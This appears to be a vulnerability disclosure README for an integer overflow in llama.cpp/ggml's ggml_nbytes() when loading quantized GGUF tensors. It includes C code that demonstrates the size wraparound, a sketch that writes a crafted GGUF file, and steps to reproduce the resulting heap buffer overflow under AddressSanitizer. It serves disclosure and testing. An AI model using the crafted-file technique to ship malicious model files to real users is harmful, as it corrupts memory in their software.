# GGUF ggml_nbytes Integer Overflow PoC
- **Vulnerability:** integer overflow in `ggml_nbytes()` for quantized GGUF tensor types (Q4_0, Q8_0, etc.)
- **Impact:** heap buffer overflow when loading a crafted GGUF model file
- **Affected:** llama.cpp / ggml (all versions prior to the CVE-2026-33298 fix)
- **CWE:** CWE-190 (Integer Overflow or Wraparound) leading to CWE-122 (Heap-based Buffer Overflow)
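For context, the root cause is unchecked size arithmetic: the byte size of a quantized tensor is computed from attacker-controlled dimensions in the GGUF header, and the 64-bit product can wrap. The standalone sketch below reproduces this class of wraparound with illustrative dimensions (the actual PoC uses values that wrap to exactly 4 bytes); only the Q4_0 block constants, 32 elements per 18-byte block, are taken from ggml:

```c
// Illustrative wraparound in ggml_nbytes()-style size arithmetic.
// The dimension values are made up for demonstration; they are NOT the
// payload encoded in overflow.gguf.
#include <stdint.h>
#include <stdio.h>

int main(void) {
    // Real Q4_0 layout constants in ggml: 32 elements per 18-byte block.
    const uint64_t blck_size = 32;
    const uint64_t type_size = 18;

    // Hypothetical attacker-controlled dimensions from the GGUF header.
    const uint64_t ne0 = 32;                 // one block per row -> 18 bytes/row
    const uint64_t ne1 = UINT64_C(1) << 31;
    const uint64_t ne2 = UINT64_C(1) << 33;

    // Unchecked multiplication: the true size is 18 * 2^64 bytes (~332 EB),
    // but the 64-bit product wraps to 0.
    uint64_t nbytes = ne0 / blck_size * type_size;
    nbytes *= ne1;
    nbytes *= ne2;

    printf("computed nbytes = %llu\n", (unsigned long long) nbytes);
    // A loader that allocates `nbytes` and later walks the tensor by its
    // logical element count reads far past the end of the allocation.
    return 0;
}
```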
## Files
- `overflow.gguf` - malicious GGUF file (192 bytes) that triggers the overflow
- `craft_gguf_overflow.py` - Python script that generates the malicious GGUF file (a C sketch of the same idea follows this list)
- `test_overflow.c` - C program demonstrating that `ggml_nbytes()` returns 4 bytes instead of ~576 PB
- `test_heap_overflow.c` - C program, built with ASan, demonstrating the actual heap buffer overflow
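For reference, a generator like `craft_gguf_overflow.py` only has to emit a minimal GGUF v3 header describing a single Q4_0 tensor with oversized dimensions. The C sketch below shows the idea; the dimension values are illustrative placeholders, not the actual PoC payload, and the shipped Python script may lay the file out differently:

```c
// Hedged sketch of a malicious GGUF generator: one Q4_0 tensor whose
// dimensions are chosen so the byte-size product wraps modulo 2^64.
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static void w32(FILE *f, uint32_t v) { fwrite(&v, 4, 1, f); }
static void w64(FILE *f, uint64_t v) { fwrite(&v, 8, 1, f); }

int main(void) {
    FILE *f = fopen("overflow.gguf", "wb");
    if (!f) return 1;

    fwrite("GGUF", 1, 4, f);  // magic
    w32(f, 3);                // GGUF version 3
    w64(f, 1);                // tensor_count
    w64(f, 0);                // metadata_kv_count

    // Tensor info: name, n_dims, dims, ggml type, offset into the data section.
    const char *name = "t";
    w64(f, strlen(name));
    fwrite(name, 1, strlen(name), f);
    w32(f, 3);                    // n_dims
    w64(f, 32);                   // ne[0]: one Q4_0 block per row
    w64(f, UINT64_C(1) << 31);    // ne[1]  \ illustrative values whose byte-size
    w64(f, UINT64_C(1) << 33);    // ne[2]  / product wraps modulo 2^64
    w32(f, 2);                    // GGML_TYPE_Q4_0
    w64(f, 0);                    // offset 0 in the data section

    // Pad to the default 32-byte alignment, then emit a token data section
    // that is vastly smaller than the tensor's true size.
    long pos = ftell(f);
    while (pos % 32) { fputc(0, f); pos++; }
    for (int i = 0; i < 32; ++i) fputc(0, f);

    fclose(f);
    return 0;
}
```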
## Reproduction
```sh
# Build llama.cpp from source
git clone https://github.com/ggml-org/llama.cpp && cd llama.cpp
mkdir build && cd build && cmake .. && make ggml

# Compile and run the test
g++ -O0 -g -fsanitize=address -I../ggml/include -o test test_heap_overflow.c \
    -L./ggml/src -lggml -lggml-base -lggml-cpu -lm -lpthread -ldl
./test overflow.gguf
```
ASan will report: `heap-buffer-overflow: READ ... 176 bytes after 4-byte region`
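For orientation, the check in `test_overflow.c` presumably boils down to something like the sketch below, which uses the public gguf/ggml API (`gguf_init_from_file`, `ggml_get_first_tensor`, `ggml_nbytes`); the shipped test programs may differ in detail:

```c
// Sketch of the size check: parse the crafted file and print what
// ggml_nbytes() claims each tensor occupies.
#include <stdio.h>
#include "ggml.h"
#include "gguf.h"  // in older ggml trees the gguf API lives in ggml.h instead

int main(int argc, char **argv) {
    if (argc < 2) { fprintf(stderr, "usage: %s model.gguf\n", argv[0]); return 1; }

    struct ggml_context *ctx = NULL;
    struct gguf_init_params params = { /*no_alloc =*/ false, /*ctx =*/ &ctx };
    struct gguf_context *gctx = gguf_init_from_file(argv[1], params);
    if (!gctx) { fprintf(stderr, "failed to parse %s\n", argv[1]); return 1; }

    // With the crafted dimensions, ggml_nbytes() reports 4 bytes here even
    // though the tensor logically spans ~576 PB.
    for (struct ggml_tensor *t = ggml_get_first_tensor(ctx); t != NULL;
         t = ggml_get_next_tensor(ctx, t)) {
        printf("%s: ggml_nbytes = %zu\n", t->name, ggml_nbytes(t));
    }

    gguf_free(gctx);
    ggml_free(ctx);
    return 0;
}
```

`test_heap_overflow.c` presumably goes one step further and actually reads through the undersized tensor buffer, which is the out-of-bounds access ASan flags above.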